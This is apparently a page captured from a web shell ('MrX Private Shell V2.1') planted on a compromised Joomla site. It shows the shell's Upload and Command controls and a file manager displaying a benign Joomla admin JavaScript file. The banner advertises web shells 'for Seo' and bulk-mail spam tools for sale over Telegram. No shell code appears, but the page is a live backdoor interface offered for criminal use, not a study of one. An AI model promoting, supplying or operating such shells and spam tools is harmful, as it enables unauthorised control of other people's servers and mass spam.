__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/**
 * @copyright  (C) 2019 Open Source Matters, Inc. <https://www.joomla.org>
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */
(document => {

  document.addEventListener('DOMContentLoaded', () => {
    window.jSelectModuleType = () => {
      const elements = document.querySelectorAll('#moduleDashboardAddModal .modal-footer .btn.hidden');
      if (elements.length) {
        setTimeout(() => {
          elements.forEach(button => {
            button.classList.remove('hidden');
          });
        }, 1000);
      }
    };
    const buttons = document.querySelectorAll('#moduleDashboardAddModal .modal-footer .btn');
    const hideButtons = [];
    let isSaving = false;
    if (buttons.length) {
      buttons.forEach(button => {
        if (button.classList.contains('hidden')) {
          hideButtons.push(button);
        }
        button.addEventListener('click', event => {
          let elem = event.currentTarget;

          // There is some bug with events in iframe where currentTarget is "null"
          // => prevent this here by bubble up
          if (!elem) {
            elem = event.target;
          }
          if (elem) {
            const clickTarget = elem.dataset.bsTarget;

            // We remember to be in the saving process
            isSaving = clickTarget === '#saveBtn';

            // Reset saving process, if e.g. the validation of the form fails
            setTimeout(() => {
              isSaving = false;
            }, 1500);
            const iframe = document.querySelector('#moduleDashboardAddModal iframe');
            const content = iframe.contentDocument || iframe.contentWindow.document;
            const targetBtn = content.querySelector(clickTarget);
            if (targetBtn) {
              targetBtn.click();
            }
          }
        });
      });
    }
    const elementH = document.querySelector('#moduleDashboardAddModal');
    if (elementH) {
      elementH.addEventListener('hide.bs.modal', () => {
        hideButtons.forEach(button => {
          button.classList.add('hidden');
        });
      });
      elementH.addEventListener('hidden.bs.modal', () => {
        if (isSaving) {
          setTimeout(() => {
            window.parent.location.reload();
          }, 1000);
        }
      });
    }
  });
})(document);

Filemanager

Name Type Size Permission Actions
admin-add_module.js File 2.29 KB 0664
admin-add_module.min.js File 956 B 0664
admin-add_module.min.js.gz File 440 B 0664
admin-cpanel-default.js File 3.7 KB 0664
admin-cpanel-default.min.js File 1.84 KB 0664
admin-cpanel-default.min.js.gz File 973 B 0664
admin-system-loader.js File 1.95 KB 0664
admin-system-loader.min.js File 1.07 KB 0664
admin-system-loader.min.js.gz File 621 B 0664
Filemanager